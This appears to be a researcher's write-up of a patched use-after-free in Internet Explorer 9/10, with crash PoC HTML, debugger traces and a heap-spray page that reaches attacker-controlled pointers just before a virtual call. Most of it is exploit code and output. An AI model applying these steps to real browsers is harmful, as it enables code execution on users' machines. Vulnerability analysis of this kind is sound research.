The latest M$ Patch Tuesday update killed one of my 0days in Microsoft Internet Explorer 9/10, so I decided to release the proof-of-concept code and write up some analysis of this bug. I hope it is helpful.

Here is the PoC:

<!doctype html>
<html>
	<head>
		<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" />
		<script>
			function testcase(){
				document.body.appendChild(document.createElement('progress'));
				document.body.appendChild(document.createElement("<track style='float:right'></track>"));
				document.body.appendChild(document.createElement('progress'));
				document.body.appendChild(document.createElement('table'));
				document.body.appendChild(document.createElement("<track style='float:right'></track>"));
				document.getElementsByTagName('progress').item(0).appendChild(document.createElement('frameset'));
				document.getElementsByTagName('track').item(0).offsetWidth;

				document.getElementsByTagName('progress').item(1).appendChild(document.getElementsByTagName('track').item(0));
				document.body.appendChild(document.createElement("<ins style='margin-left:2222222222px'></ins>"));
			}
		</script>
	</head>
	<body onload='testcase();'>

	</body>
</html>

After running this HTML we get a nice crash:

(fcc.354): Access violation - code c0000005 (!!! second chance !!!)
eax=0b7befc0 ebx=088cd6b8 ecx=0b6b2fa8 edx=00000006 esi=0b6b2fa8 edi=00000000
eip=639927e9 esp=088cd1c8 ebp=088cd1d0 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202
MSHTML!CTreeNode::GetFancyFormat+0xc:
639927e9 0fb74640 movzx eax,word ptr [esi+40h] ds:0023:0b6b2fe8=0000
0:017> u
MSHTML!CTreeNode::GetFancyFormat+0xc:
639927e9 0fb74640 movzx eax,word ptr [esi+40h]
639927ed 6685c0 test ax,ax

Now, using my binary instrumentation framework (a PIN-based tool that can do things like crash analysis, taint tracing, and code coverage), I got the following output:

Exception Point: 639927e9 0fb74640 movzx eax,word ptr [esi+40h]
Current Register:
eax:0b7befc0
esi:0b6b2fa8
Backtrace analyze:
[+]639927e7 -> esi: 0b6b2fa8 | ecx: 0b6b2fa8
[+]639927e5 -> ecx: 0b6b2fa8
[+]636c1d2d -> ecx:0b6b2fa8
[+]639ae295 -> esi: 0b6b2fa8
===================
Detect Freed Address: 0b6b2fa8 at EIP 639AE299
With param: HeapFree(150000,23,0b6b2fa8)

So it is a pretty nice use-after-free vulnerability. But what is freed?

Running the tool again, this time collecting information about heap allocations, I can see:

.....
Detect Heap Allocate : 638f13dc
With Param: HeapAlloc(150000, 8u, 0x54)
Return value: 0b6b2fa8

The allocation happens in CMarkup::InsertElementInternal. So now we can use a little trick to take control of the freed address:

<!doctype html>
<html>
	<head>
		<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" />
		<script>
			function testcase(){
				// create 100 img elements whose src strings will be rewritten later
				var img = new Array();
				for(var i = 0;i < 100;i++){
					img[i] = document.createElement('img');
					img[i]["src"] = "a";
				}

				// same sequence as the first PoC: the track node gets freed here
				document.body.appendChild(document.createElement('progress'));
				document.body.appendChild(document.createElement("<track style='float:right'></track>"));
				document.body.appendChild(document.createElement('progress'));
				document.body.appendChild(document.createElement('table'));
				document.body.appendChild(document.createElement("<track style='float:right'></track>"));
				document.getElementsByTagName('progress').item(0).appendChild(document.createElement('frameset'));
				document.getElementsByTagName('track').item(0).offsetWidth;

				document.getElementsByTagName('progress').item(1).appendChild(document.getElementsByTagName('track').item(0));
				document.body.appendChild(document.createElement("<ins style='margin-left:2222222222px'></ins>"));

				window.scroll(500);

				// rewrite the src strings so their data lands in the freed block
				for(var j = 0;j < 99;j++){
					img[j]["src"] = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";
				}
			}
		</script>
	</head>
	<body onload='testcase();'>

	</body>
</html>

And we get:

(c10.d88): Access violation - code c0000005 (!!! second chance !!!)
eax=00000041 ebx=088cd6b8 ecx=00410041 edx=ff000000 esi=0c53efa8 edi=00000000
eip=639927ff esp=088cd1c8 ebp=088cd1d0 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
MSHTML!CTreeNode::GetFancyFormat+0x1e:
639927ff 8b4a2c mov ecx,dword ptr [edx+2Ch] ds:0023:ff00002c=????????
0:017> dd esi
0c53efa8 00410041 00410041 00410041 00410041
0c53efb8 00410041 00410041 00410041 00410041
0c53efc8 00410041 00410041 00410041 00410041
0c53efd8 00410041 00410041 00410041 00410041
0c53efe8 00410041 00410041 00410041 00410041
0c53eff8 00410041 d0d00000 ???????? ????????
0c53f008 ???????? ???????? ???????? ????????
0c53f018 ???????? ???????? ???????? ????????
0:017> dd 410041
00410041 b341be78 7274f8ac 18ea3e88 3c00005c
00410051 ff000000 4dffffff cbb7a93b b0487827
00410061 ebd03627 48a7a85f 3d00005c ff000000
00410071 98ffffff 9b1b1704 a14da1bb 315fec5b
00410081 74f7c784 3e00005c ff000000 f0ffffff
00410091 0d343fb3 ae43076f 1b2599a9 a86d9aad
004100a1 3f00005c ff000000 93ffffff ddca1f10
004100b1 844c01b0 ebee76ab dc391fca 4000005c
0:017> u
Why does it crash here?

.text:639927E9 movzx eax, word ptr [esi+40h]
.text:639927ED test ax, ax
.text:639927F0 js loc_63842DAE
.text:639927F6 mov ecx, [esi+50h]
.text:639927F9 mov edx, [ecx+80h]
.text:639927FF mov ecx, [edx+2Ch]
Since we control what esi points to, we can force the program to take the jump to 63842DAE by changing a few bytes in img.src:

..
img[j]["src"] = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\u8141\u4141AAAAAAAA";}
....

(614.fd4): Access violation - code c0000005 (!!! second chance !!!)
eax=00000000 ebx=00000000 ecx=00410041 edx=b341be78 esi=088ccc00 edi=0c540fa8
eip=6383a61a esp=088ccbe0 ebp=088ccbf0 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
MSHTML!CTreeNode::ComputeFormats+0xa1:
6383a61a 8b82c4000000 mov eax,dword ptr [edx+0C4h] ds:0023:b341bf3c=????????
0:017> dd edi
0c540fa8 00410041 00410041 00410041 00410041
0c540fb8 00410041 00410041 00410041 00410041
0c540fc8 00410041 00410041 00410041 00410041
0c540fd8 00410041 00410041 00410041 00410041
0c540fe8 41418141 00410041 00410041 00410041
0c540ff8 00410041 d0d00000 ???????? ????????
0c541008 ???????? ???????? ???????? ????????
0c541018 ???????? ???????? ???????? ????????
0:017> dd ecx
00410041 b341be78 7274f8ac 18ea3e88 3c00005c
00410051 ff000000 4dffffff cbb7a93b b0487827
00410061 ebd03627 48a7a85f 3d00005c ff000000
00410071 98ffffff 9b1b1704 a14da1bb 315fec5b
00410081 74f7c784 3e00005c ff000000 f0ffffff
00410091 0d343fb3 ae43076f 1b2599a9 a86d9aad
004100a1 3f00005c ff000000 93ffffff ddca1f10
004100b1 844c01b0 ebee76ab dc391fca 4000005c

And now we change edi:

img[j]["src"] = "AAAAAAAAAAAAAAAAAAAAAAAA\u5555\u5555AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\u8141\u4141AAAAAAAA";}

And boom:

eax=00000000 ebx=00000000 ecx=55555555 edx=640386e0 esi=088ccc00 edi=0c678fa8
eip=6383a618 esp=088ccbe0 ebp=088ccbf0 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
MSHTML!CTreeNode::ComputeFormats+0x9f:
6383a618 8b11 mov edx,dword ptr [ecx] ds:0023:55555555=????????
0:017> u
MSHTML!CTreeNode::ComputeFormats+0x9f:
6383a618 8b11 mov edx,dword ptr [ecx]
6383a61a 8b82c4000000 mov eax,dword ptr [edx+0C4h]
6383a620 ffd0 call eax
6383a622 8b400c mov eax,dword ptr [eax+0Ch]
6383a625 57 push edi
6383a626 893e mov dword ptr [esi],edi
6383a628 894604 mov dword ptr [esi+4],eax
6383a62b 8b0f mov ecx,dword ptr [edi]

Good luck pwner :p